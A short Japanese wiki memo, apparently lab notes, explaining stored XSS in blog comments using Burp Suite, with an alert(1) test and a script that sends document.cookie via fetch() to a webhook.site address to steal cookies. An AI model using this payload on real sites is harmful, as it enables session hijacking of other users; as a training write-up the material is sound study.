BurpSuite_XSS - meruneru/tech_memo GitHub Wiki
ブログサービスに投稿すると、他ユーザーにコメントを表示できるとする。
下記のように投稿すると、ブログサービスは<p>This post was extremely helpful.</p>を返答することが想定される。
POST /post/comment HTTP/1.1 Host: vulnerable-website.com Content-Length: 100 postId=3&comment=This+post+was+extremely+helpful.&name=Carlos+Montoya&email=carlos%40normal-user.net
ここで、commentが<script>/* Bad stuff here... */</scrip>と仕組まれていて、そのままサービス内DBに保存されると、閲覧した他ユーザーのブラウザ上で任意スクリプトが実行されることになる。
ブログの記事にコメントを投稿できるサービスで、コメント欄に<script>alert(1);</script>と投稿するとクリアできた。
ブログのコメント欄にstored XSSを仕込んで、クッキーを盗み取る。 クッキーの送信先はwebhook.siteを指定すると良さそうだ。
<script>
fetch('https://webhook.site/59985c26-45d9-45f1-8e0b-8cfc378b69ba', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>